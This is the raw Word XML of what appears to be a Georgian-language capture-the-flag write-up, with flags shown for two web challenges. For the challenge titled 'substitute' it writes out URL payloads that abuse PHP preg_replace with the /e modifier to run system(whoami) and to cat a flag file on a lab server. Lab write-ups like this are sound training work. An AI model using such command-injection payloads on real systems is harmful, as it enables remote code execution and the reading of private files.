          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6288D4F0" wp14:editId="365DEC41">
            <wp:extent cx="5572903" cy="1228896"/>
            <wp:effectExtent l="0" t="0" r="8890" b="9525"/>
            <wp:docPr id="13144702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70258" name="Picture 1" descr="A black background with white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479" w14:textId="07E5DFFB" w:rsidR="00A3776A" w:rsidRDefault="00A3776A" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A3776A">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ctf{57b23475b9b02093a9eb5d7df5f07957e2b2dc724443d6b08961fbe3387cf91f}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E9C1A7" w14:textId="2E061532" w:rsidR="00BB631B" w:rsidRDefault="00BB631B" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>10.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>frameble</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DC91B13" w14:textId="727D67C5" w:rsidR="00BB631B" w:rsidRDefault="00BB631B" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>შესვლისას გვხვდება სარეგისტრაციო და საავტორიზაციო ველი</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
        <w:t>დავრეგისტრირდეთ.</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB631B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB631B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CA189B4" wp14:editId="1C2C81D4">
            <wp:extent cx="4648849" cy="3762900"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1534569171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9171" name="Picture 1" descr="A screenshot of a login scree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047" w14:textId="56E25A9B" w:rsidR="00BB631B" w:rsidRDefault="00BB631B" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>გადაგვიყვანა ასეთ ფეიჯზე.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2D9C02" w14:textId="16826964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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2411CEA9" wp14:editId="70BCF09E">
            <wp:extent cx="5943600" cy="2813685"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="1554413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3804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A4" w14:textId="1336E8CF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წეროთ პოსტი</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4403F4" w14:textId="2EDFFB56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61B9D4B4" wp14:editId="283403B8">
            <wp:extent cx="5943600" cy="2386330"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="996570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70027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F61C" w14:textId="7437D8D9" w:rsidR="00BB631B" w:rsidRDefault="00BB631B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ჩვენი პოსტი მიღებულია და ელოდება ადმინისტრატორის განხილვას.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9B16FD" w14:textId="4D47992A" w:rsidR="00BB631B" w:rsidRDefault="00BB631B" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB631B">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4ECBC603" wp14:editId="7A782E30">
            <wp:extent cx="5906324" cy="3610479"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1905489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89662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655" w14:textId="4503AAFF" w:rsidR="00BB631B" w:rsidRPr="00C0284C" w:rsidRDefault="009C4333" w:rsidP="003D3A12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t>11.substitute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49211E81" w14:textId="77777777" w:rsidR="009C4333" w:rsidRPr="00C0284C" w:rsidRDefault="009C4333" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CE16E6A" w14:textId="0C477B3F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lastRenderedPageBreak/>
        <w:t>გვაქვს მოცემული სორსი ფეიჯზე შესვლისას.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="009C4333">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D4FE5DF" wp14:editId="6D326883">
            <wp:extent cx="5258534" cy="3019846"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2016456326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6326" name="Picture 1" descr="A computer code on a white background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6680" w14:textId="29569E7C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აქ ჩვენ შეგვიძლია </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0284C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">preg replace </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ზე ზემოქმედება.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D2E575" w14:textId="642BEAD3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ვცადოთ </w:t>
      </w:r>
      <w:r w:rsidRPr="00C0284C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ზე მანიპულირება ვექტორზე.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E454F13" w14:textId="424CEE36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 xml:space="preserve">გავწეროთ შემდეგი </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId71" w:history="1">
        <w:r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whoami)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3AB7DF90" w14:textId="77777777" w:rsidR="009C4333" w:rsidRDefault="009C4333" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="793829B3" w14:textId="76D525CB" w:rsidR="009C4333" w:rsidRDefault="009C4333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მოგვიტანა რაღაც დეითა.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F4430E" w14:textId="1DDC7178" w:rsidR="009C4333" w:rsidRDefault="009C4333" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C4333">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2CF9BBB2" wp14:editId="03A270DD">
            <wp:extent cx="4763165" cy="2676899"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="98120816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08164" name="Picture 1" descr="A computer code with text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6F1" w14:textId="706E5A8A" w:rsidR="009C4333" w:rsidRDefault="00806000" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0284C">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve">Ls </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>ის გაწერით გვიგდებს ჩამონათვალს</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00806000">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="549452B2" wp14:editId="59356C86">
            <wp:extent cx="5544324" cy="2791215"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="919264027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64027" name="Picture 1" descr="A computer code on a white background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B244" w14:textId="5BE48544" w:rsidR="00806000" w:rsidRDefault="00806000" w:rsidP="003D3A12">
      <w:pPr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ავხსნათ ფლეგი.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B00617" w14:textId="153EC2DB" w:rsidR="00806000" w:rsidRDefault="00000000" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId74" w:history="1">
        <w:r w:rsidR="00806000" w:rsidRPr="00006555">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="32"/>
            <w:szCs w:val="32"/>
            <w:lang w:val="ka-GE"/>
          </w:rPr>
          <w:t>http://34.141.39.165:32693/?vector=/Admin/e&amp;replace=system(cat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00806000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00806000" w:rsidRPr="00806000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>here_we_dont_have_flag/flag.txt</w:t>
      </w:r>
      <w:r w:rsidR="00806000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00806000" w:rsidRPr="00806000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00806000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
        <w:t>დაა მივიღეთ ფლეგი</w:t>
      </w:r>
      <w:r w:rsidR="00806000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00806000">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00806000" w:rsidRPr="00806000">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23C6028F" wp14:editId="73BDAE63">
            <wp:extent cx="5943600" cy="1341755"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="16130401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4015" name="Picture 1" descr="A close-up of a computer scree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4733" w14:textId="6D1F7C69" w:rsidR="00806000" w:rsidRPr="00806000" w:rsidRDefault="00806000" w:rsidP="003D3A12">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00806000">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="ka-GE"/>
        </w:rPr>
        <w:t>CTF{92b435bcd2f70aa18c38cee7749583d0adf178b2507222cf1c49ec95bd39054c}</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00806000" w:rsidRPr="0080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E4"/>
    <w:rsid w:val="0005415B"/>
    <w:rsid w:val="00084C19"/>
    <w:rsid w:val="00205D51"/>
    <w:rsid w:val="0026055B"/>
    <w:rsid w:val="003D3A12"/>
    <w:rsid w:val="00426629"/>
    <w:rsid w:val="00461CB6"/>
    <w:rsid w:val="00485FF9"/>
    <w:rsid w:val="004D4C94"/>
    <w:rsid w:val="005B3184"/>
    <w:rsid w:val="006C70AB"/>
    <w:rsid w:val="006E1055"/>
    <w:rsid w:val="007123CB"/>
    <w:rsid w:val="00765D2A"/>
    <w:rsid w:val="00780F87"/>
    <w:rsid w:val="007A650B"/>
    <w:rsid w:val="00806000"/>
    <w:rsid w:val="0094730F"/>
    <w:rsid w:val="009C4333"/>
    <w:rsid w:val="00A2177E"/>
    <w:rsid w:val="00A3776A"/>
    <w:rsid w:val="00A94F9A"/>
    <w:rsid w:val="00B409EA"/>
    <w:rsid w:val="00B65A0C"/>
    <w:rsid w:val="00BB631B"/>
    <w:rsid w:val="00C0284C"/>
    <w:rsid w:val="00D347E4"/>
    <w:rsid w:val="00D962A0"/>
    <w:rsid w:val="00DD0647"/>
    <w:rsid w:val="00EB1068"/>
    <w:rsid w:val="00E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1C0A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{263E6AE0-5361-4004-BBAA-4769439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hyperlink" Target="http://34.141.39.165:32693/?vector=/Admin/e&amp;replace=system(cat" TargetMode="External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hyperlink" Target="File:///home/ctf/app.py" TargetMode="External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hyperlink" Target="http://34.141.39.165:32693/?vector=/Admin/e&amp;replace=system(whoami)" TargetMode="External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72DE-5693-4C69-A0B0-8A045F04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 Matiashvili</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Goga Matiashvili</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-25T18:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-26T20:35:00Z</dcterms:modified>
</cp:coreProperties>
</file>